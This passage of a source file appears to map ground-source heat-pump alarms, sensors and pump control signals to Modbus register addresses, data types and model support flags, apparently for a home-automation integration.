{ KEY_ADDRESS: 1, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_C:
{ KEY_ADDRESS: 2, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_D:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_E:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_HIGH_PRESSURE_SWITCH_ALARM:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LOW_PRESSURE_LEVEL_ALARM:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HIGH_DISCHARGE_PIPE_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_OPERATING_PRESSURE_LIMIT_INDICATION:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_DISCHARGE_PIPE_SENSOR_ALARM:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LIQUID_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 14, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SUCTION_GAS_SENSOR_ALARM:
{ KEY_ADDRESS: 15, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_FLOW_PRESSURE_SWITCH_ALARM:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POWER_INPUT_PHASE_DETECTION_ALARM:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INVERTER_UNIT_ALARM:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_SUPPLY_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_LOW_SPEED_ALARM:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LOW_SUPER_HEAT_ALARM:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_PRESSURE_RATIO_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 27, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_PRESSURE_OUTSIDE_ENVELOPE_ALARM:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_TEMPERATURE_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_SENSOR_ALARM:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_OUT_SENSOR_ALARM:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_IN_SENSOR_ALARM:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_OUT_SENSOR_ALARM:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_OUTDOOR_SENSOR_ALARM:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TWC_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_TANK_SENSOR_ALARM:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_BRINE_DELTA_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TAP_WATER_MID_SENSOR_ALARM:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_CIRCULATION_RETURN_SENSOR_ALARM:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HGW_SENSOR_ALARM:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ALARM:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_HIGH_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_OUT_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_CIRCULATION_RETURN_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_SUPPLY_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 64, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_RETURN_LINE_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 65, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SUM_ALARM:
{ KEY_ADDRESS: 66, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_TANK_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_HUMIDITY_ROOM_SENSOR_ALARM:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_TANK_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TEMPERATURE_ROOM_SENSOR_ALARM:
{ KEY_ADDRESS: 74, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INVERTER_UNIT_COMMUNICATION_ALARM:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POOL_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_STOP_FOR_POOL:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_START_BRINE_PUMP:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_RELAY_FOR_BRINE_GROUND_WATER_PUMP:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TAP_WATER_END_TANK_SENSOR_ALARM:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MAXIMUM_TIME_FOR_ANTI_LEGIONELLA_EXCEEDED_ALARM:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_GENESIS_SECONDARY_UNIT_ALARM:
{ KEY_ADDRESS: 83, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PRIMARY_UNIT_CONFLICT_ALARM:
{ KEY_ADDRESS: 84, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PRIMARY_UNIT_NO_SECONDARY_ALARM:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_OIL_BOOST_IN_PROGRESS:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COMPRESSOR_CONTROL_SIGNAL:
{ KEY_ADDRESS: 199, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SMART_GRID_1:
{ KEY_ADDRESS: 201, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ALARM_INPUT:
{ KEY_ADDRESS: 202, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SMART_GRID_2:
{ KEY_ADDRESS: 204, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_CONTROL_SIGNAL:
{ KEY_ADDRESS: 206, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 209, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_PUMP_ON_OFF_CONTROL:
{ KEY_ADDRESS: 210, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 211, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HOT_GAS_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 213, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_BRINE_PUMP_ON_OFF_CONTROL:
{ KEY_ADDRESS: 218, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_HEATER_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 219, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HEATING_SEASON_ACTIVE:
{ KEY_ADDRESS: 220, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_ACTIVE:
{ KEY_ADDRESS: 221, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ACTIVE:
{ KEY_ADDRESS: 222, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_HGW_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 223, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_HEAT_PUMP_STOPPING:
{ KEY_ADDRESS: 224, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HEAT_PUMP_OK_TO_START:
{ KEY_ADDRESS: 225, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_SUPPLY_LINE_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 230, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 232, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_WCS_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 233, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TWC_END_TANK_HEATER_CONTROL_SIGNAL:
{ KEY_ADDRESS: 234, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POOL_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 235, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 236, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_POOL_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 237, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SURPLUS_HEAT_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 238, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 239, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_CIRCUIT_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 240, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 241, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 242, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PASSIVE_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 243, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_POOL_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 244, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INDICATION_WHEN_MIXING_VALVE_1_IS_PRODUCING_PASSIVE_COOLING:
{ KEY_ADDRESS: 245, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_IS_UNABLE_TO_SPEED_UP:
{ KEY_ADDRESS: 246, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_FIRST_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 1, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_AVAILABLE_GEARS:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_SPEED_RPM:
